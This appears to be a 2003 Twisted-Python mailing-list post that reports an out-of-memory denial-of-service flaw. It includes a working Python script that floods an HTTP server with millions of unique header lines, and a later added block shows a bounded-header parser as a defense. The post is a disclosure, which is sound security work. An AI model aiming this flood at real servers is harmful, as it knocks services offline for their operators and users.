[Twisted-Python] ANN: Twisted 1.0.6 (includes security fixes)
Andrew Dalke
dalke at dalkescientific.com
Tue Jul 1 12:04:52 MDT 2003
Me:
> Was the out-of-memory denial of service attack fixed?
>
>
> http://www.twistedmatrix.com/pipermail/twisted-python/2003-June/004462.html
Err, that code doesn't actually work (it reuses the same header names,
so there isn't a memory problem). Here's some real attack code:
===== KillIt.py
import socket

class KillIt:
    def __init__(self, where):
        self.f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.f.connect(where)
        self.f.send("GET / HTTP/1.1\r\n")
        self.n = 0

    def kill(self):
        factor = 1000000
        for i in range(self.n*factor, (self.n+1)*factor):
            self.f.send("%s: X\r\n" % i)
            if i%1000 == 0: print i
        self.n += 1
=======
>>> import KillIt
>>> server = KillIt.KillIt( ("localhost", 8080) )
>>> server.kill()
... lots of output showing that it's dumping headers ...
>>> server.kill()
... each invocation takes about 50MB or so
>>> server.kill()
... repeat until desired ...
Andrew
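
Added example, not part of the original post and not Twisted's own code: one way a server-side parser can bound the memory that one connection's headers consume, by capping distinct header names, total header bytes and line length. The class and function names and the limit values are assumptions made for illustration.

```python
# Added example (not Twisted code): bound header memory per connection.
# All names and limit values here are assumptions chosen for illustration.
MAX_HEADER_COUNT = 100          # distinct header names allowed per request
MAX_HEADER_BYTES = 16 * 1024    # total bytes of header lines per request
MAX_LINE_BYTES = 8 * 1024       # longest single line, complete or partial


class HeaderLimitExceeded(Exception):
    """Caller should answer with an error and drop the connection."""


class BoundedHeaderParser:
    def __init__(self):
        self.request_line = None
        self.headers = {}
        self.nbytes = 0
        self.done = False
        self._buf = b""

    def feed(self, data):
        """Consume raw bytes; return True once the blank line ends the headers."""
        self._buf += data
        while not self.done:
            line, sep, rest = self._buf.partition(b"\r\n")
            if len(line) > MAX_LINE_BYTES:
                # Covers a partial line too, so an unterminated line cannot grow forever.
                raise HeaderLimitExceeded("line too long")
            if not sep:
                return False            # wait for more data
            self._buf = rest
            if self.request_line is None:
                self.request_line = line
            elif line == b"":
                self.done = True
            else:
                self.nbytes += len(line) + 2
                if len(self.headers) >= MAX_HEADER_COUNT or self.nbytes > MAX_HEADER_BYTES:
                    raise HeaderLimitExceeded("too many or too large headers")
                name, _, value = line.partition(b":")
                self.headers[name.strip().lower()] = value.strip()
        return True


def stored_before_reject(n):
    """Feed n constructed headers with unique numeric names; return how many were kept."""
    parser = BoundedHeaderParser()
    parser.feed(b"GET / HTTP/1.1\r\n")
    try:
        for i in range(n):
            parser.feed(b"%d: X\r\n" % i)
    except HeaderLimitExceeded:
        pass
    return len(parser.headers)
```

The byte cap also covers repeated header names, which the count of distinct names alone would not catch.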